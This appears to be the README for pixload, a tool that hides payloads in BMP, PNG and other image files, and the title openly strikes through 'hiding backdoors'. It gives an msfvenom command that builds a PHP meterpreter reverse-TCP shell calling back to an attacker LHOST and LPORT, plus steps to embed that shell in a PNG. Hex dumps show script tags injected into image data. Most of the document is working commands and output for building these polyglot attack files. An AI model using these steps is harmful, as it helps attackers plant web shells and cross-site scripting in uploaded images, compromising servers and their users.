Image Payload Creating/Injecting tools
Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.
The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
Useful references for better understanding of pixload and its use-cases:
If you want to encode a payload in such a way that the resulting binary blob is both valid x86 shellcode and a valid image file, I recommend you to look here and here.
If you want to inject a metasploit payload, try something like this:
```
msfvenom -p php/meterpreter_reverse_tcp \
    LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
# Edit payload.php if needed.
./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
```
The following Perl modules are required:
GD
Image::ExifTool
String::CRC32
On Debian-based systems install these packages:
```
sudo apt install libgd-perl libimage-exiftool-perl libstring-crc32-perl
```
On OSX please refer to this workaround (thnx 2 @iosdec).
```
docker build -t pixload .
docker run -v "$(pwd):/pixload" -it --rm pixload
```
BMP Payload Creator/Injector.
Create a minimal BMP Polyglot Image with custom/default payload, or inject payload into existing image.
```
./bmp.pl [-payload 'STRING'] -output payload.bmp
```
If the output file exists, the payload is injected into the existing file. Otherwise a new one is created.
```
./bmp.pl -output payload.bmp
[>| BMP Payload Creator/Injector |] Generating output file
[✔] File saved to: payload.bmp
[>] Injecting payload into payload.bmp
[✔] Payload was injected successfully
payload.bmp: PC bitmap, OS/2 1.x format, 1 x 1
00000000  42 4d 2f 2a 00 00 00 00  00 00 1a 00 00 00 0c 00  |BM/*............|
00000010  00 00 01 00 01 00 01 00  18 00 00 00 ff 00 2a 2f  |..............*/|
00000020  3d 31 3b 3c 73 63 72 69  70 74 20 73 72 63 3d 2f  |=1;<script src=/|
00000070  01 00 01 01 01 11 00 ff  c4 00 14 00 01 00 00 00  |................|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 03 ff da 00  |................|
00000090  08 01 01 00 00 00 01 3f  ff d9                    |.......?..|
0000009a
```
PNG Payload Creator/Injector.
Create a PNG Image with custom/default payload, or inject payload into existing image.
The payload is injected into IDAT data chunks.
```
./png.pl [-payload 'STRING'] -output payload.png
```
If the output file exists, the payload is injected into the existing file. Otherwise a new one is created.
```
./png.pl -output payload.png
[>| PNG Payload Creator/Injector |] Generating output file
[✔] File saved to: payload.png
[>] Injecting payload into payload.png
[+] Chunk size: 13
[+] Chunk type: IHDR
[+] CRC: fc18eda3
[+] Chunk size: 9
[+] Chunk type: pHYs
[+] CRC: 952b0e1b
[+] Chunk size: 25
[+] Chunk type: IDAT
[+] CRC: c8a288fe
[+] Chunk size: 0
[+] Chunk type: IEND
[>] Inject payload to the new chunk: 'pUnk'
[✔] Payload was injected successfully
payload.png: PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 19 49 44 41 54 48 89  |...+......IDATH.|
00000040  ed c1 31 01 00 00 00 c2  a0 f5 4f ed 61 0d a0 00  |..1.......O.a...|
00000050  00 00 6e 0c 20 00 01 c8  a2 88 fe 00 00 00 00 49  |..n. ..........I|
00000060  45 4e 44 ae 42 60 82 00  00 00 00 00 00 00 00 00  |END.B`..........|
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000c0  00 1f 70 55 6e 6b 3c 73  63 72 69 70 74 20 73 72  |..pUnk<script sr|
```